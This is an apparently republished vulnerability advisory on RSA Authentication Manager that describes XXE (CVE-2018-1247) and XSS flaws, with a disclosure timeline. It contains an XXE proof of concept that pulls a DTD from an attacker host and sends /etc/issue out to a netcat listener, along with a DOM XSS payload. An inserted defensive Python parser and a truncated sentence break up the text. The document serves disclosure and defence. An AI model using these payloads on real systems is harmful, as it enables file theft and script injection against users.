EMC RSA Authentication Manager CVE-2018-1247 – XML External Entity Injection

Authors: SEC Consult
Risk: High
CVE: CVE-2018-1247
0day: XML External Entity Injection
0day-id: 0DAY-176191
Date: 2018-05-17


RSA Authentication Manager Security Console, version 8.3 and earlier, contains an XML External Entity (XXE) vulnerability. This could potentially allow admin users to cause a denial of service or extract server data by injecting a maliciously crafted DTD into an XML file submitted to the application.


“RSA provides more than 30,000 customers around the world with the essential
security capabilities to protect their most valuable assets from cyber
threats. With RSA’s award-winning products, organizations effectively detect,
investigate, and respond to advanced attacks; confirm and manage identities;
and ultimately, reduce IP theft, fraud, and cybercrime.”

Source: https://www.rsa.com/en-us/company/about

Business recommendation

By exploiting the vulnerabilities documented in this advisory, an attacker can
obtain sensitive information from the RSA Authentication Manager file system,
initiate arbitrary TCP connections or cause a denial of service. In addition,
clients of the RSA Authentication Manager can be affected by exploiting client-side

SEC Consult recommends applying the available patches from the vendor.

Cross-site Flashing

The vulnerable flash file does not filter or escape the user input
sufficiently. This leads to a reflected cross-site scripting vulnerability.
With reflected cross-site scripting, an attacker can inject arbitrary HTML or
JavaScript code into the victim’s web browser. Once the victim clicks a
malicious link the attacker’s code is executed in the context of the victim’s
web browser.

The vulnerability exists in a third party component called pmfso.
This issue has been fixed by RSA as described in the advisory DSA-2018-082.

DOM based Cross-site Scripting

Several client-side scripts handle user supplied data with insufficient
validation before storing it in the DOM. This issue can be exploited to cause
reflected cross-site scripting.

The identified issues exist in third party components. One of the affected
components is PopCalendarX which has an assigned CVE (CVE-2017-9072).
This issue has been fixed by RSA as described in the advisory DSA-2018-082.

Two further issues affecting other third party components are not yet fixed,
as the third party vendor has not yet supplied a patch to RSA.


XML External Entity Injection (XXE) (CVE-2018-1247)

The Security Console of the RSA Authentication Manager allows authenticated
users to import SecurID Token jobs in XML format. By importing an XML file
with malicious XML code to the application, it is possible to exploit a blind
XXE vulnerability within the application.

For example, in order to read arbitrary files from the RSA Authentication
Manager OS, the following malicious XML file can be imported via the affected

POST /console-ims/ImportTokenJob.do?ptoken=[snip] HTTP/1.1
Host: <host>:7004
Cookie: [snip]
Content-Disposition: form-data; name="textImportFileName.theFile";
Content-Type: text/xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "http://<attacker>/a.dtd">
Content-Disposition: form-data; name="textImportFileName.uploadResult"

In this case, the attacker has to host the defined a.dtd file in the web root
of a controlled web server:

# cat /var/www/a.dtd
<!ENTITY % p1 SYSTEM "file:///etc/issue">
<!ENTITY % p2 "<!ENTITY e1 SYSTEM 'http://<attacker>:8080/%p1;'>">

Assuming that the RSA Authentication Manager OS has network level access to
the TCP port 80 and 8080 of the attacker controlled IP address, as soon as the
malicious XML file gets uploaded and parsed, the contents of the /etc/issue
file (as an example) are leaked to a remote listener controlled by the attacker:

# nc -nlvp 8080
listening on [any] 8080 ...
connect to [<attacker>] from (UNKNOWN) [<host>] 32817
GET /RSA%20Authentication%20Manager% HTTP/1.1

Similarly, contents of other internal files can be obtained from the affected
system with current service user permissions.
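The payload above works only because the importing parser is willing to process a DOCTYPE and fetch the external DTD it names. The following is an added example of the corresponding defensive check, written here for this page and not code from SEC Consult, RSA or the Authentication Manager: an upload parser built on Python's standard-library expat binding that refuses any DOCTYPE declaration and any external entity reference before file or network access could occur. The token-job XML structure (`tokenJob`, `token serial=...`) and the host name `dtd-host.invalid` are constructed for the demonstration; the real SecurID token job format is not shown on this page.

```python
import xml.parsers.expat


class UnsafeXmlError(ValueError):
    """Raised when an upload carries a DOCTYPE or an external entity reference."""


def _reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
    # The advisory's payload is nothing but a DOCTYPE pointing at an external
    # DTD, so every DOCTYPE is refused, whatever it names and whether or not it
    # carries an internal subset.
    raise UnsafeXmlError(
        f"DOCTYPE {doctype_name!r} rejected (SYSTEM id {system_id!r})"
    )


def _reject_external_entity(context, base, system_id, public_id):
    # expat only reaches this handler for an external entity reference, which
    # cannot exist without a DOCTYPE; refusing it explicitly keeps the policy
    # visible and independent of expat's default handling.
    raise UnsafeXmlError(f"external entity {system_id!r} rejected")


def parse_untrusted_xml(data: bytes) -> list:
    """Parse an untrusted XML upload and return its element names in document order.

    Both handlers raise UnsafeXmlError, so the parser never resolves a DTD or an
    external entity.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _reject_doctype
    parser.ExternalEntityRefHandler = _reject_external_entity
    names = []
    parser.StartElementHandler = lambda name, attrs: names.append(name)
    parser.Parse(data, True)
    return names


def upload_accepted(data: bytes) -> bool:
    """True if the upload parses under the policy above, False if it was rejected."""
    try:
        parse_untrusted_xml(data)
    except UnsafeXmlError:
        return False
    return True


# Constructed samples (hypothetical token-job format, not the advisory's traffic):
# a benign job, the same job behind the external-DTD DOCTYPE pattern the
# advisory describes, and a job with an internal subset declaring a file entity.
BENIGN_JOB = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<tokenJob><token serial="000123456789"/></tokenJob>'
)
DOCTYPE_JOB = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE foo SYSTEM "http://dtd-host.invalid/a.dtd">'
    b'<tokenJob><token serial="000123456789"/></tokenJob>'
)
INTERNAL_ENTITY_JOB = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE tokenJob [<!ENTITY e1 SYSTEM "file:///etc/issue">]>'
    b'<tokenJob>&e1;</tokenJob>'
)

if __name__ == "__main__":
    print("benign job accepted:", upload_accepted(BENIGN_JOB))
    print("external DTD accepted:", upload_accepted(DOCTYPE_JOB))
    print("internal entity accepted:", upload_accepted(INTERNAL_ENTITY_JOB))
```

Rejecting the DOCTYPE outright, rather than trying to distinguish harmless from harmful DTDs, is the simplest policy for an upload feature whose documents never legitimately need one; the same rule is what the egress restriction in the paragraph above (no outbound TCP from the appliance to arbitrary hosts) backs up at the network layer.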

Cross-site Flashing

The issue affects a third party component pmfso (DSA-2018-082).
To exploit a reflected cross-site scripting via the vulnerable SWF Flash file
it is sufficient to click the following URL:

DOM based Cross-site Scripting

Example 1:
The issue affects a third party component PopCalendarX (CVE-2017-9072).
To exploit DOM based reflected cross-site scripting it is enough to trick a
victim into executing the following JavaScript (e.g. by clicking on a
specially crafted link):

window.name = "gToday:#' onload='alert(document.domain)' ";
location.href = "https://<host>:7004/IMS-AA-IDP/common/scripts/calendar/ipopeng.htm";

Example 2:
Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.

Example 3:
Proof of concept has been removed. The issue affects another third party
component. The fix has not been issued by the third party vendor so far.

Vulnerable / tested versions

The identified vulnerabilities have been verified to exist in the
RSA Authentication Manager, version which was the latest
version available during the test.


Vendor contact timeline

2017-11-23: Contacting vendor through security_alert@emc.com
2017-11-24: Vendor confirms the information was received, forwards it
 to the responsible team for investigation and assigns tickets.
2017-12-08: Vendor acknowledges all reported issues as valid. Remediation
 plan is being determined.
2018-01-04: Contacting vendor for a status update.
2018-01-04: Vendor provides a possible fix date.
2018-02-21: Vendor provides a status update regarding the fix release date.
2018-04-24: Vendor contacts for credit text approval.
2018-05-08: Contacting vendor for the reason of the uncoordinated public
 release and for status information.
2018-05-08: Vendor provides an update regarding their public release and
 status of vulnerabilities not included in the release, vendor info:
 * DSA-2018-086 (http://seclists.org/fulldisclosure/2018/May/18)
 was released on 5/4
 * DSA-2018-082 (https://community.rsa.com/docs/DOC-92083)
 was released on 5/3
2018-05-16: Security advisory release


The vendor has released an advisory that contains recommendations on how to
resolve the reported XML External Entity Injection vulnerability:
DSA-2018-086 – https://community.rsa.com/docs/DOC-92085 – (RSA Link Sign On Required)

Full Disclosure archive:

Note: the suggested resolution also provides a fix for the Cross-site Flashing
and DOM based Cross-site Scripting (Example 1 only) issues described above.
